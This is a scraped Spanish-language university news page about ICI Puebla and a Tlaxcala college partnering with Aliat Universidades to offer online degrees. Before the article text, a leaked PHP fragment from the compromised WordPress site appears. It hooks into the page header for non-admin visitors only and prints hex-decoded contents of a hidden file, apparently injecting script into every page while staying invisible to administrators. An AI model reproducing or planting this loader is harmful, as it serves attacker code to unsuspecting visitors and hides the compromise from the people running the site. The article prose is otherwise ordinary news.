if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ICI amplia oferta académica tras alianza con Aliat Universidades – La Opinión Universitaria La Opinión Universitaria
Menu

ICI amplia oferta académica tras alianza con Aliat Universidades

  • Será a partir del próximo periodo escolar que ya se estarán impartiendo las nuevas licenciaturas, maestrías y doctorados

Por Diego Cuautle

El Instituto de Ciencias Jurídicas (ICI) de Puebla y el Centro de Estudios Superiores de Tlaxcala ampliarán su oferta académica modalidad online la cual será respaldada por Aliat Universidades, una de las instituciones más importantes en México en este rubro, gracias a la firma de convenio que celebraron las tres instituciones.

Durante dicho evento, el director del ICI, German Molina Carrillo señaló que Aliat Universidades tiene objetivos muy claros en cuanto al trabajo que desarrollan en el nivel superior en las diferentes modalidades con la idea de formar personas con sentido social.

Al señalar que Aliat busca mantener el nivel óptimo en la prestación de los servicios educativos, a partir del próximo periodo escolar ya se estarán ofertando las licenciaturas en Administración de Empresas, Mercadotécnica, Comercio Internacional, Pedagogía, Administración de Empresas Turísticas, entre otras. También las maestrías en Docencia y Gestión Educativa, y el doctorado en Educación.

“EL ICI colaborará con la oferta de Aliat para ofertar los programas académicos en la ciudad de Puebla. Serán impartidos a distancia lo que no resulta fácil pero el compromiso está en ellos, en ofrecer los servicios de calidad que son exitosos, innovadores y actualizados y que han dado resultado en otros estados”, indicó.

Antes de concluir, Molina Carrillo reiteró que el ICI se encargará de dar la difusión correspondiente para que los poblanas sepan lo que se está ofertando y puedan comenzar pedir informes e inscribirse en cuanto sea posible.

Por su parte, Humberto Treviño Flores, director Comercial de Aliat Universidades expresó su beneplácito con la firma del convenio con la universidad poblana y el Centro de Estudios Superiores y reiteró su compromiso por atender las necesidades de quienes confíen en ellos.

Recordó que actualmente tienen 50 mil alumnos más de 1100 alumnos en las diferentes modalidades tanto presencial, virtual y ejecutiva, “estamos convencido de que la educación es la llave para trasformar vidas, buscamos que cada estudiante y colaborador logren alcanzar la mejor versión de sí mismo.

“Trabajamos por ser una red innovadora con la más alta calidad, accesibilidad y relevancia y que permita a los estudiantes empelarse y poder buscar la movilidad sociedad de nuestro país. Estamos conscientes del importante papel que tiene la educación en México independientemente de su ubicación geográfica”, comento.

Subrayó que la principal clave para incrementar las habilidades es facilitar el acceso a la educación, por eso la oferta académico y el modelo educativo está diseñado para permitir que junto a los socios comerciales, los alumnos tengan mayor acceso a una educación superior.

Agregó que el objetivo es generar movilidad social en México bajo la impartición de la educación de calidad a través de plataformas online, facilitando el acceso a la mayor población y creando mayores oportunidades.

Finalmente dijo que ambas instituciones demuestran que son vanguardistas y con visión y que apuestan por el futuro de la educación para seguir trasformando, “estamos convencido de que juntos podemos trasformar una gran cantidad de vidas y seguir encabezando la trasformación educativa en el país”.

  • No comments

    Deja una respuesta

    Tweets recientes